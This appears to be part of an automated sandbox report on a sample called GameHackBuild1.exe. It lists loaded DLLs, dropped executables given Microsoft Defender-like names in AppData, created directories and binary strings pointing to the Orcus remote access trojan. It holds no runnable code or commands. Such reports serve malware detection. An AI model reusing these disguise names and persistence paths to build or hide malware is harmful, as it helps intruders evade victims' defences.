                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: taskschd.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: sxs.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: ktmw32.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: dlnashext.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: wpdshext.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeDirectory created: C:\Program Files\Microsoft\SSblKNNQege.exe
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeDirectory created: C:\Program Files\Microsoft\f2aefc5695405c
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeDirectory created: C:\Program Files\Windows Portable Devices\SSblKNNQege.exe
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeDirectory created: C:\Program Files\Windows Portable Devices\f2aefc5695405c
                      Source: GameHackBuild1.exe.bin.exeStatic file information: File size 9469375 > 1048576
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: GameHackBuild1.exe.bin.exe
                      Source: Binary string: q$costura.orcus.staticcommands.pdb.zip source: MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.Plugins\obj\Release\Orcus.Plugins.pdb8 source: MpDefenderProtector.exe, 00000007.00000002.1323937386.0000000004EC0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\Dokumente\GitHub\starksoft-aspen\Starksoft.Aspen\obj\Release\starksoft.aspen.pdbL source: RegAsm.exe, 00000012.00000002.2519892872.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000031EA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000003144000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2540236748.0000000005E90000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.StaticCommands\obj\Release\Orcus.StaticCommands.pdb source: RegAsm.exe, 00000012.00000002.2539787539.0000000005E60000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000003144000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.fluentcommandlineparser.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: orcus.plugins;costura.orcus.plugins.dll.zip;costura.orcus.plugins.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.orcus.shared.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.Shared.Utilities\obj\Release\Orcus.Shared.Utilities.pdb source: MpDefenderProtector.exe, 00000007.00000002.1339235069.00000000058A0000.00000004.08000000.00040000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002949000.00000004.00000800.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.000000000316A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: q'costura.fluentcommandlineparser.pdb.zip source: MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.Plugins\obj\Release\Orcus.Plugins.pdb source: MpDefenderProtector.exe, 00000007.00000002.1323937386.0000000004EC0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: costura.orcus.staticcommands.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: directoryinfoex?costura.directoryinfoex.dll.zip?costura.directoryinfoex.pdb.zipUes.microsoft.win32.taskscheduler.resourcesucostura.es.microsoft.win32.taskscheduler.resources.dll.zip/fluentcommandlineparserOcostura.fluentcommandlineparser.dll.zipOcostura.fluentcommandlineparser.pdb.zipUfr.microsoft.win32.taskscheduler.resourcesucostura.fr.microsoft.win32.taskscheduler.resources.dll.zip/icsharpcode.sharpziplibOcostura.icsharpcode.sharpziplib.dll.zipUit.microsoft.win32.taskscheduler.resourcesucostura.it.microsoft.win32.taskscheduler.resources.dll.zip+jetbrains.annotationsKcostura.jetbrains.annotations.dll.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.shelllibrary.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: orcus.shared9costura.orcus.shared.dll.zip9costura.orcus.shared.pdb.zip-orcus.shared.utilitiesMcostura.orcus.shared.utilities.dll.zipMcostura.orcus.shared.utilities.pdb.zip)orcus.staticcommandsIcostura.orcus.staticcommands.dll.zipIcostura.orcus.staticcommands.pdb.zip%sharpdx.direct3d11Ecostura.sharpdx.direct3d11.dll.zip#sharpdx.direct3d9Ccostura.sharpdx.direct3d9.dll.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\Dokumente\GitHub\starksoft-aspen\Starksoft.Aspen\obj\Release\starksoft.aspen.pdb source: RegAsm.exe, 00000012.00000002.2519892872.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000031EA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000003144000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2540236748.0000000005E90000.00000004.08000000.00040000.00000000.sdmp
